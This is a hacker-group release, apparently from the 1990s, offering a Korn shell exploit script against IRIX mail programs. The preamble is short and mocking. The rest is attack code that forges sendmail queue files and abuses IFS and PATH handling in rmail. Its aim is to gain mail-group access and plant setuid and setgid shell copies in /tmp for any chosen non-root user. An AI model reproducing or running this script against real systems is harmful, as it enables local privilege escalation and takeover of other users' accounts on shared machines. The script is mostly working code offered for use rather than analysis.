[r00t.2] [irixmksh] [public release] There are bugs in the IRIX mail proggies. This sample script exploits them to give you an suid shell of any user on the system, EXCEPT, for uid=0. Obviously, this script should not be run if you are a clueless script kiddie and have no clue what is going to do. If this script causes any sort of harm to you, physically or virtually, them members of r00t are not responsible, and in fact will probably laugh at you. r00t -- you may not like us, but your girlfriend does. Script kiddies cut here --------------------------------------------------------------------------- #!/sbin/ksh # usage: irixmksh- creates an suid shell of any user on the system # except for uid=0 FILES=qfAA12345 putq /tmp/x usr if [ "x`uname -s`" != "xIRIX" ];then echo "this box is not running IRIX - later..." exit 1 fi if [ "$#" != "1" ]; then echo "Usage: $0 " exit 1 fi TargetUser=$1 # Make the mail queue files cat <<_r00t-text_>qfAA12345 P0 T830896940 DdfAA12345 Bblah Mdeferred: just cuz... C$TargetUser Sroot R<"|/tmp/x"> H?P?return-path: H?D?date: Tue, 30 Feb 1996 12:34:56 -0400 H?F?from: root (root) Hreceived: by hackerz.dom (HackerOS/UCB 5.64/Hackerz Domain id AA12345 for root@hackerz.com; Tue, 30 Feb 1996 12:34:56 -0400 H?M?message-id: <9602301234.AA12345@localhost> Happarently-to: root@plato.coolcode.com _r00t-text_ # Make the script to run with euid=mail cat<<_r00t-text_>putq #!/bin/sh cp qfAA12345 /usr/spool/mqueue touch /usr/spool/mqueue/dfAA12345 chown root /usr/spool/mqueue/*5 _r00t-text_ chmod u+x putq # Make the script to create the suid shell cat<<_r00t-text_>/tmp/x #!/bin/sh cp /bin/sh /tmp/b00sh.$TargetUser chmod 6777 /tmp/b00sh.$TargetUser _r00t-text_ chmod u+x /tmp/x chown $TargetUser /tmp/x # Make the script to grab suid mail shell cat<<_r00t-text_>usr #!/bin/sh chgrp mail b00sh-mail chmod 2777 b00sh-mail _r00t-text_ chmod u+x usr # Now snag mail access and send the queue files. cp /bin/sh b00sh-mail export PATH=.:$PATH export IFS=/ echo "blah" | rmail $LOGNAME export IFS= b00sh-mail putq mailq # Clean Up: rm $FILES --------------------------------------------------------------------------- Then cut here too. r00t